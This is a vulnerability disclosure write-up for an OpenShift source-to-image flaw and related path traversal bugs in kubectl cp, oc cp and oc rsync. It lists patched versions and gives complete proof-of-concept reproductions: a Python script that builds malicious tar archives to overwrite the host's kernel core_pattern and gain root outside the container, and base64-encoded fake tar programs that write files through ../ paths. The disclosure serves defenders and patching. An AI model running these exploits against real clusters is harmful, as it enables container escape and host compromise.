Author: Michael Hanselmann. Updated: May 4, 2018.
- Gaining root on host through source-to-image build
- Reproduction
- Exploiting path traversal in kubectl cp
- Reproduction
- Exploiting path traversal in oc cp and oc rsync
- Reproduction for oc rsync
OpenShift source-to-image (S2I/STI) builds allow an unprivileged user to build Docker images on an OpenShift cluster. Unlike normal Docker builds these don't require privileged access to a Docker socket and daemon. All user-controlled code is run with reduced privileges.
In OpenShift Container Platform 3.0 up to and including 3.9 the S2I builder contained a vulnerability allowing an attacker to gain root access to the host system, that is even outside any Docker container. Its reference is CVE-2018-1102. Red Hat has fixed the vulnerability in the following OpenShift errata releases on April 27, 2018:
- OpenShift Container Platform 3.9.25
- OpenShift Container Platform 3.7.44
- OpenShift Container Platform 3.6.173.0.113
- OpenShift Container Platform 3.5.5.31.67
- OpenShift Container Platform 3.1 through 3.4 also received updates
OpenShift Online 3.x and OpenShift Dedicated 3.x were also affected and have been patched by Red Hat.
The underlying cause is comparable to an issue in Kubernetes' kubectl cp
command I found and reported in March 2018 (Kubernetes issue 61297, Red Hat bug 1564305, reference CVE-2018-1002100). The same code can be found in OpenShift's oc cp
command and OpenShift's oc rsync
command was vulnerable too.
Gaining root on host through source-to-image build
The source-to-image builder supports incremental builds. It does so by looking for a script named save-artifacts
in the last image built by a build configuration. The archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader
passed filenames from tar headers as input to filepath.Join
without further sanitization. The same code is used by oc rsync
, making it equally exploitable.
Engineering a build to emit a malicious tar archive from save-artifacts
was almost trivial. The main challenge was that the S2I builder makes exactly one call to the execve(2)
system call to invoke bsdtar
, and that's well before the artifacts are unpacked and can insert or replace executables. No dynamic library is loaded either.
The proof of concept exploit now relies on the fact that the builder container can overwrite the kernel's core_pattern
, described in more detail in core(5)
. Once that's done the build triggers a core dump and the kernel executes the command previously written to core_pattern
in the context of the host system. Here we'll only use an Nginx container, but it'd be trivial to start a custom image in a privileged container with the host filesystem mounted.
The original report was reproduced against OpenShift Container Platform v3.6.173.0.96 and v3.7.23.
Reproduction
- Create a new project (depending on cluster environment this is done another way, i.e. through a control panel):
master$ oc new-project --skip-config-write poc
- Assuming the client now has access to the newly created project we'll create the necessary objects:
client$ oc -n poc create -f - <<'EOF' apiVersion: v1 kind: List items: - apiVersion: v1 kind: ImageStream metadata: name: poc spec: lookupPolicy: local: false - apiVersion: v1 kind: BuildConfig metadata: name: poc spec: failedBuildsHistoryLimit: 3 successfulBuildsHistoryLimit: 3 nodeSelector: {} runPolicy: Serial source: type: Binary binary: asFile: "" strategy: type: Source sourceStrategy: from: kind: ImageStreamTag namespace: openshift name: php:7.0 incremental: true env: - name: BUILD_LOGLEVEL value: "7" output: to: kind: ImageStreamTag name: poc:latest EOF
- For easier observation it's recommended to pin the builds to a specific host, though this isn't strictly necessary:
client$ oc -n poc patch bc/poc --type=strategic --patch='{ "spec": { "nodeSelector": { "kubernetes.io/hostname": "node.example.com" }}}'
- Assuming the build was pinned to a host, log onto that host and verify that nothing runs on port 8080:
node$ curl --show-error --silent http://localhost:8080 | head -n2 curl: (7) Failed connect to localhost:8080; Connection refused
- We'll need a Python script to generate the build input:
client$ cat >poc.py <<'EOF' #!/usr/bin/python3 # # Copyright (C) 2018, Michael Hanselmann <https://hansmi.ch/> import os import shutil import sys import tarfile import tempfile import base64 # This command runs in the context of the host system, thus we need to use # a command already available (unless we know the path of a file we can # control). Docker containers can be made privileged and can mount the host # filesystem. CORE_PATTERN = "|/bin/docker run -d --name demo -p 8080:80 nginx" # "core_pattern" may be at most 128 characters long, see core(5) assert len(CORE_PATTERN) <= 128 with tempfile.NamedTemporaryFile() as tmpbinarytar, \ tarfile.TarFile.open(tmpbinarytar.name, "w") as binarytar, \ tempfile.NamedTemporaryFile() as tmpinnertar, \ tarfile.TarFile.open(tmpinnertar.name, "w") as innertar: # Marker file to detect when a build used "save-artifacts" with tempfile.NamedTemporaryFile() as empty: empty.write(b"marker") empty.flush() innertar.add(empty.name, arcname="artifactmarker") # Just for fun: redirect write to /proc via symlink; writing directly to # "../../../../../proc/sys/..." would also work link = tarfile.TarInfo() link.name = "proc" link.type = tarfile.SYMTYPE link.linkname = "../../../../../../../../proc" innertar.addfile(link) with tempfile.NamedTemporaryFile() as corepattern: corepattern.write(CORE_PATTERN.encode("ascii")) corepattern.flush() innertar.add(corepattern.name, arcname="proc/sys/kernel/core_pattern") innertar.close() with tempfile.NamedTemporaryFile() as script: script.write("""#!/bin/bash base64 -d <<'EOF' """.encode("ascii")) script.write(base64.b64encode(open(tmpinnertar.name, 'rb').read())) script.write(b""" EOF """) script.flush() os.chmod(script.name, 0o755) binarytar.add(script.name, arcname=".s2i/bin/save-artifacts") with tempfile.NamedTemporaryFile() as script: script.write("""#!/bin/bash find /tmp -type f | sort echo cat /proc/sys/kernel/core_pattern echo if test -e /tmp/artifacts/artifactmarker && [ "$(< /proc/sys/kernel/core_pattern)" == '{0}' ]; then # Trigger core pattern bash -c 'ulimit -c unlimited; kill -ABRT $$'; echo $? sleep 2 fi exit 0 """.format(CORE_PATTERN).encode("ascii")) script.flush() os.chmod(script.name, 0o755) binarytar.add(script.name, arcname=".s2i/bin/assemble") binarytar.close() tmpbinarytar.seek(0) shutil.copyfileobj(tmpbinarytar, sys.stdout.buffer) EOF
- Now we start the first build to put the malicious
save-artifacts
script in position. The result of this build is pushed to the cluster-internal registry.client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
- Once finished we go for the kill. This second build will retrieve artifacts from the first build and by unpacking those overwrites the kernel's
core_pattern
. Theassemble
script will detect that the settings are in place and will trigger a core dump.client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
- Give the system a few seconds (or more if the image needs to be fetched) and then check on the node again:
node$ curl --show-error --silent http://localhost:8080 | head -n2 <!DOCTYPE html> <html>
This Nginx server in a container was started by a source-to-image build which isn't supposed to have this kind of access.
Exploiting path traversal in kubectl cp
The kubectl cp
command uses the tar
program installed within a container to create an archive. It then proceeds to unpack the archive on the client. When the container is controlled by a malicious party who can get a victim to copy any file from a container, i.e. for debugging, they could overwrite any file writable by the victim and whose path can be predicted.
This behaviour can be confirmed in kubectl v1.9.5 as well as Red Hat's OpenShift Origin 3.7.2, a downstream consumer of Kubernetes code. It's a result of the code in kubernetes/pkg/kubectl/cmd/cp.go:untarAll
using unsanitized filenames from the tar headers as input to filepath.Join
. It's been fixed in Kubernetes 1.9.6 and 1.10 (Kubernetes issue 61297).
The client code doesn't set the file mode, hence the PoC uses a plain text file. If the attacker knows the path of an executable writable by the victim (or the latter runs the client as root), executables can be replaced and code execution on the client is gained. There are ways to gain code execution from non-executable files.
While not demonstrated, it's to be expected that a modified and malicious K8s API server could inject arbitrary files into any program execution request originating from a file copy and wouldn't even need a prepared and explicitly requested container.
Reproduction
- Set up a Kubernetes 1.9.5 cluster within a virtual machine using the instructions in the upstream documentation
- For the sake of simplicity we'll use a busybox container and patch it manually, but obviously the malicious tar program could be part of the image (including a widely used base image) and be more advanced than used for the demonstration.
$ kubectl create -f - <<'EOF' apiVersion: extensions/v1beta1 kind: Deployment metadata: name: poc namespace: default spec: replicas: 1 selector: matchLabels: app: poc template: metadata: creationTimestamp: null labels: app: poc spec: containers: - command: - /bin/sh - -c - while sleep 1000; do :; done image: docker.io/library/busybox:latest imagePullPolicy: Always name: busybox volumeMounts: - mountPath: /usr/local/sbin name: store dnsPolicy: ClusterFirst restartPolicy: Always schedulerName: default-scheduler securityContext: {} terminationGracePeriodSeconds: 30 volumes: - emptyDir: {} name: store EOF
- Generate a script to simulate a
tar
program. We're using a Python program to generate shell script. Write the result into the container and make it executable. An example output follows.#!/usr/bin/python3 import tarfile import tempfile import os import base64 with tempfile.NamedTemporaryFile() as tmpfile, \ tarfile.TarFile.gzopen(tmpfile.name, "w") as tar: with tempfile.NamedTemporaryFile() as text: text.write(b"Hello World\n") text.flush() tar.add(text.name, arcname="../../../../../../../var/tmp/unexpected") tar.close() print("#!/bin/sh") print("base64 -d <<EOF | gunzip -c") print(base64.b64encode(open(tmpfile.name, 'rb').read()). decode("ascii")) print("EOF")
Example:$ kubectl exec -it poc-... /bin/sh # Run within container $ cat >/usr/local/sbin/tar <<'EOTAR' && chmod +x /usr/local/sbin/tar #!/bin/sh base64 -d <<EOF | gunzip -c H4sICHzQqVoC/3RtcGF5dmlhajdhAO3PQQrCMBCF4Vl7ipwgmTRNewVv4LrY7KopMRWPb3F pQReCUPg/HrzFzOZZ6+wm96G4epndck2POZ1rGuUXuupUX63bVvWt+NDEJkT1fSvqu9BHMS p/sNzqUIyRknP99Pft/j5uJ45pmrI55TKNBwEAAAAAAAAAAAAAAAAA7MYTXHs6TAAoAAA= EOF EOTAR
- Verify that PoC-generated file doesn't exist on client system.
$ stat /var/tmp/unexpected stat: cannot stat '/var/tmp/unexpected': No such file or directory
- Now comes the part which would've to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory.
$ kubectl cp poc-...:/etc/hosts /tmp/container-hosts
- A file has been written in /var/tmp on the client system:
$ cat /var/tmp/unexpected Hello World
Exploiting path traversal in oc cp
and oc rsync
The oc rsync
command, just like kubectl cp
, uses the tar
program installed within a container to create an archive. See the section on exploiting kubectl cp
for more details. oc cp
is the same underlying code as kubectl cp
.
oc rsync
uses the same archive unpacking code as the source-to-image builder. The focus was on producing an exploit for the latter, but for demonstration purposes a proof-of-concept exploit was made nonetheless. It's a result of the archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader
using unsanitized filenames from tar headers as input to filepath.Join
.
The original report used the following reproduction environment, though far more versions were vulnerable:
- Cluster: OpenShift v3.6.173.0.96 on up-to-date RHEL 7.4 systems, though the specific version doesn't matter
- Clients:
- oc v3.7.2+282e43f (OpenShift Origin)
- oc v3.6.173.0.96 (OpenShift Container Platform)
Reproduction for oc rsync
This demonstration uses oc rsync
. oc cp
can be exploited by combining the pod setup here with the instructions from kubectl cp
.
- Create a new project (depending on cluster environment this is done another way, i.e. through a control panel):
$ oc new-project --skip-config-write poc
- Assuming the client now has access to the newly created project we'll create the necessary objects. The container is already pre-configured with a malicious
tar
program which was generated using the Python script already used forkubectl cp
.$ oc -n poc create -f - <<'EOF' apiVersion: v1 kind: List items: - apiVersion: v1 kind: ConfigMap metadata: name: override data: tar: | #!/bin/sh base64 -d <<EOF | gunzip -c H4sICP8WvloC/3RtcGhwZ3d6dmV4AO3PQQrCMBCF4Vl7ipwgmZjYXMEbuC42u2pKTMXjW1xa0IUg FP6PB28xs3nWOrvKva+uXSY3X/NjyueWB/mFLjrVV+u6VX0UH/aHFH0IKYn6LmoSo/IH86311Rip pbRPf9/u7+M24pjHsZhTqeOwEwAAAAAAAAAAAAAAAADAZjwBJlLCbQAoAAA= EOF - apiVersion: v1 kind: DeploymentConfig metadata: name: rsyncpoc spec: replicas: 1 selector: deployment-config.name: rsyncpoc strategy: type: Rolling template: metadata: labels: deployment-config.name: rsyncpoc spec: containers: - image: busybox imagePullPolicy: Always command: - /bin/sh - -c - while sleep 1000; do :; done name: default-container resources: {} terminationMessagePath: /dev/termination-log terminationMessagePolicy: File volumeMounts: - name: override readOnly: true mountPath: /usr/local/sbin dnsPolicy: ClusterFirst restartPolicy: Always schedulerName: default-scheduler securityContext: {} terminationGracePeriodSeconds: 30 volumes: - name: override configMap: defaultMode: 420 name: override items: - key: tar path: tar mode: 0555 test: false triggers: - type: ConfigChange EOF
- Verify that PoC-generated file doesn't exist on client system.
$ stat /var/tmp/unexpected stat: cannot stat '/var/tmp/unexpected': No such file or directory
- This part would've to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory. Get the actual pod name first using
oc -n poc get pod
.$ oc -n poc rsync rsyncpoc-...:/foo /tmp/
- A file has been written in
/var/tmp
on the client system:$ cat /var/tmp/unexpected Hello World